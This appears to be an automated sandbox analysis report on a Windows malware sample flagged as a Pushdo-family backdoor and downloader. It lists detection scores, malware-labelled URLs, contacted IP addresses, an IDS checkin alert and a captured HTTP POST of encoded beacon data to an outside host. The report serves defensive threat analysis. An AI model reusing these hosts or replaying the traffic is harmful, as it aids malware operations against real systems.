Click to jump to signature section
Source: eQcKjYOV30.exe | ReversingLabs: Detection: 41% |
Source: eQcKjYOV30.exe | Virustotal: Detection: 34% | Perma Link |
Source: http://www.credo.edu.pl/p | Avira URL Cloud: Label: malware |
Source: http://www.credo.edu.pl/ | Avira URL Cloud: Label: malware |
Source: http://www.credo.edu.pl/l | Avira URL Cloud: Label: malware |
Source: http://www.credo.edu.pl/f | Avira URL Cloud: Label: malware |
Source: http://www.credo.edu.pl/. | Avira URL Cloud: Label: malware |
Source: http://www.credo.edu.pl/5 | Avira URL Cloud: Label: malware |
Source: http://www.credo.edu.pl/d | Avira URL Cloud: Label: malware |
Source: http://www.credo.edu.pl/Z | Avira URL Cloud: Label: malware |
Source: C:\Users\user\pigalicapi.exe | ReversingLabs: Detection: 41% |
Source: C:\Users\user\pigalicapi.exe | Joe Sandbox ML: detected |
Source: 0.2.eQcKjYOV30.exe.4140000.2.unpack | Avira: Label: TR/Patched.Ren.Gen8 |
Source: 0.3.eQcKjYOV30.exe.4140000.1.unpack | Avira: Label: TR/Patched.Ren.Gen8 |
Source: 1.3.pigalicapi.exe.4130000.1.unpack | Avira: Label: TR/Patched.Ren.Gen8 |
Source: 0.3.eQcKjYOV30.exe.4140000.0.unpack | Avira: Label: TR/Patched.Ren.Gen8 |
Source: 2.3.pigalicapi.exe.41a0000.0.unpack | Avira: Label: TR/Patched.Ren.Gen8 |
Source: 2.2.pigalicapi.exe.41a0000.2.unpack | Avira: Label: TR/Patched.Ren.Gen8 |
Source: 0.2.eQcKjYOV30.exe.400000.0.unpack | Avira: Label: TR/Spy.Gen |
Source: 2.2.pigalicapi.exe.40e290.1.unpack | Avira: Label: TR/Downloader.Gen |
Source: 2.3.pigalicapi.exe.41a0000.1.unpack | Avira: Label: TR/Patched.Ren.Gen8 |
Source: 2.2.pigalicapi.exe.400000.0.unpack | Avira: Label: TR/Spy.Gen |
Source: 1.2.pigalicapi.exe.4130000.2.unpack | Avira: Label: TR/Patched.Ren.Gen8 |
Source: 0.2.eQcKjYOV30.exe.40e290.1.unpack | Avira: Label: TR/Downloader.Gen |
Source: 1.2.pigalicapi.exe.40e290.1.unpack | Avira: Label: TR/Downloader.Gen |
Source: 1.3.pigalicapi.exe.4130000.0.unpack | Avira: Label: TR/Patched.Ren.Gen8 |
Source: 1.2.pigalicapi.exe.400000.0.unpack | Avira: Label: TR/Spy.Gen |
Source: C:\Users\user\Desktop\eQcKjYOV30.exe | Code function: 0_2_00408A70 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptImportKey,CryptImportKey,CryptDecrypt,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext, | 0_2_00408A70 |
Source: C:\Users\user\Desktop\eQcKjYOV30.exe | Code function: 0_2_00408970 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptImportKey,CryptEncrypt,CryptDestroyKey,CryptReleaseContext, | 0_2_00408970 |
Source: C:\Users\user\Desktop\eQcKjYOV30.exe | Code function: 0_2_00408800 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptGenKey,CryptExportKey,CryptImportKey,CryptExportKey,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext, | 0_2_00408800 |
Source: C:\Users\user\Desktop\eQcKjYOV30.exe | Code function: 0_2_004047F0 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptDeriveKey,CryptDecrypt,CryptDestroyKey,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptDestroyHash,CryptReleaseContext, | 0_2_004047F0 |
Source: C:\Users\user\Desktop\eQcKjYOV30.exe | Code function: 0_2_00404BA0 CoInitialize,SetEvent,WaitForSingleObject,VirtualAlloc,VirtualAlloc,VirtualAlloc,GetCurrentThreadId,GetSystemMetrics,GetSystemMetrics,GlobalMemoryStatus,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,wsprintfA,CryptBinaryToStringA,MultiByteToWideChar,VirtualFree,EnterCriticalSection,VirtualAlloc,VirtualAlloc,GetTickCount,VirtualFree,LeaveCriticalSection,VirtualFree,VirtualFree,VirtualFree,VirtualFree,CoUninitialize, | 0_2_00404BA0 |
Source: C:\Users\user\Desktop\eQcKjYOV30.exe | Code function: 0_2_00408BB0 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext, | 0_2_00408BB0 |
Source: C:\Users\user\Desktop\eQcKjYOV30.exe | Code function: 0_2_00408CF0 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptDeriveKey,CryptDecrypt,CryptDestroyKey,CryptDestroyHash,CryptReleaseContext, | 0_2_00408CF0 |
Source: C:\Users\user\Desktop\eQcKjYOV30.exe | Code function: 0_2_00404880 CryptCreateHash,CryptHashData,CryptDeriveKey,CryptDecrypt,CryptDestroyKey,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptDestroyHash,CryptReleaseContext, | 0_2_00404880 |
Source: C:\Users\user\Desktop\eQcKjYOV30.exe | Unpacked PE file: 0.2.eQcKjYOV30.exe.400000.0.unpack |
Source: C:\Users\user\pigalicapi.exe | Unpacked PE file: 1.2.pigalicapi.exe.400000.0.unpack |
Source: C:\Users\user\pigalicapi.exe | Unpacked PE file: 2.2.pigalicapi.exe.400000.0.unpack |
Source: eQcKjYOV30.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE |
Source: | Binary string: X:\Q\lw5lZxa\pCNRPZPWd\1kTT\tMBc.pdb:Y source: eQcKjYOV30.exe, 00000000.00000003.322394858.00000000027C2000.00000004.00000020.00020000.00000000.sdmp, eQcKjYOV30.exe, 00000000.00000003.321963124.00000000041AB000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000002.568409805.000000000419B000.00000004.00001000.00020000.00000000.sdmp |
Source: | Binary string: X:\Q\lw5lZxa\pCNRPZPWd\1kTT\tMBc.pdb source: eQcKjYOV30.exe, 00000000.00000003.322394858.00000000027C2000.00000004.00000020.00020000.00000000.sdmp, eQcKjYOV30.exe, 00000000.00000003.321963124.00000000041AB000.00000004.00001000.00020000.00000000.sdmp, eQcKjYOV30.exe, 00000000.00000000.300422334.000000000046B000.00000002.00000001.01000000.00000003.sdmp, pigalicapi.exe, 00000001.00000000.350152613.000000000046B000.00000002.00000001.01000000.00000006.sdmp, pigalicapi.exe, 00000001.00000002.568409805.000000000419B000.00000004.00001000.00020000.00000000.sdmp |
Source: Traffic | Snort IDS: 2016867 ET TROJAN Backdoor.Win32.Pushdo.s Checkin 192.168.2.5:49704 -> 104.21.23.9:80 |
Source: Joe Sandbox View | IP Address: 103.224.212.221 103.224.212.221 |
Source: Joe Sandbox View | IP Address: 103.224.212.221 103.224.212.221 |
Source: unknown | Network traffic detected: DNS query count 100 |
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 568User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.jenco.co.ukCache-Control: no-cacheData Raw: 4a 5a 4c 4f 6e 66 34 74 62 56 41 7a 6f 35 50 79 79 58 30 62 55 4f 48 50 65 6e 32 2b 7a 35 4b 6b 45 6a 5a 65 61 48 62 58 66 39 62 2b 73 34 43 2b 59 63 52 4a 33 6a 35 62 56 75 62 5a 54 58 2f 39 65 54 44 32 65 49 79 36 59 79 51 30 51 6a 71 48 69 4e 35 62 58 75 54 6f 61 36 64 62 48 79 61 37 48 47 70 69 73 6e 36 4a 4c 62 62 44 64 37 6d 4e 49 7a 7a 65 70 67 48 64 5a 6d 64 77 72 2b 58 62 37 38 76 45 61 62 59 55 75 4f 39 2b 59 43 42 74 4a 4f 4c 79 67 73 47 75 38 71 55 4c 45 57 77 4a 41 53 6f 6b 44 76 54 2b 76 77 4c 5a 55 4f 62 34 33 4f 73 65 74 6c 64 43 4b 6d 63 4e 44 72 4f 49 72 68 5a 6f 77 69 4a 50 49 73 33 4e 6d 46 78 69 48 72 48 2f 67 56 33 52 4e 4d 59 76 68 36 35 47 45 43 47 73 2f 68 52 66 55 75 64 70 55 33 7a 77 50 46 6a 38 5a 36 6a 54 2f 51 51 6e 50 53 69 57 6f 5a 34 33 6a 4b 76 45 49 51 66 51 44 39 45 39 72 4b 54 75 4e 62 51 67 4f 64 4e 4b 50 50 34 66 37 37 46 2b 32 4b 6c 48 6f 72 2f 65 62 6d 47 55 51 54 30 36 5a 42 79 4a 56 37 63 70 36 78 52 33 63 39 4a 50 77 66 30 74 6e 49 6d 57 56 72 57 49 45 31 71 4b 77 62 63 69 72 4d 47 36 78 4a 52 48 6e 69 6b 6a 37 32 64 71 62 74 6d 34 35 4e 6e 61 69 48 46 68 61 4a 79 52 51 31 77 65 43 44 70 66 78 45 77 67 79 78 62 31 4e 63 43 6c 32 6b 7a 67 65 45 53 63 4a 75 46 30 2b 78 2b 38 54 6d 34 69 45 37 45 65 44 69 6c 6f 71 78 73 38 68 32 7a 50 57 71 72 30 41 31 37 73 6d 53 6c 4d 7a 2f 68 4a 47 38 7a 74 77 62 2b 44 5a 63 4c 73 35 6b 2f 58 7a 58 63 6f 62 58 6e 65 36 51 30 4e 32 47 33 33 42 72 75 32 4e 56 47 4e 31 6d 6d 6e 4d 4c 78 6a 46 43 57 47 2f 51 49 57 47 64 30 70 72 39 43 38 6e 4a 41 51 57 38 4c 74 6f 68 41 46 37 4c 2b 54 64 46 56 69 46 59 4d 46 43 73 55 51 63 75 74 49 6a 6a 49 2f 56 6f 71 4b 4e 30 30 55 79 79 69 73 63 56 33 6b 45 4c 35 7a Data Ascii: JZLOnf4tbVAzo5PyyX0bUOHPen2+z5KkEjZeaHbXf9b+s4C+YcRJ3j5bVubZTX/9eTD2eIy6YyQ0QjqHiN5bXuToa6dbHya7HGpisn6JLbbDd7mNIzzepgHdZmdwr+Xb78vEabYUuO9+YCBtJOLygsGu8qULEWwJASokDvT+vwLZUOb43OsetldCKmcNDrOIrhZowiJPIs3NmFxiHrH/gV3RNMYvh65GECGs/hRfUudpU3zwPFj8Z6jT/QQnPSiWoZ43jKvEIQfQD9E9rKTuNbQgOdNKPP4f77F+2KlHor/ebmGUQT06ZByJV7cp6xR3c9JPwf0tnImWVrWIE1qKwbcirMG6xJRHnikj72dqbtm45NnaiHFhaJyRQ1weCDpfxEwgyxb1NcCl2kzgeEScJuF0+x+8Tm4iE7EeDiloqxs8h2zPWqr0A17smSlMz/hJG8ztwb+DZcLs5k/XzXcobXne6Q0N2G33Bru2NVGN1mmnMLxjFCWG/QIWGd0pr9C8nJAQW8LtohAF7L+T |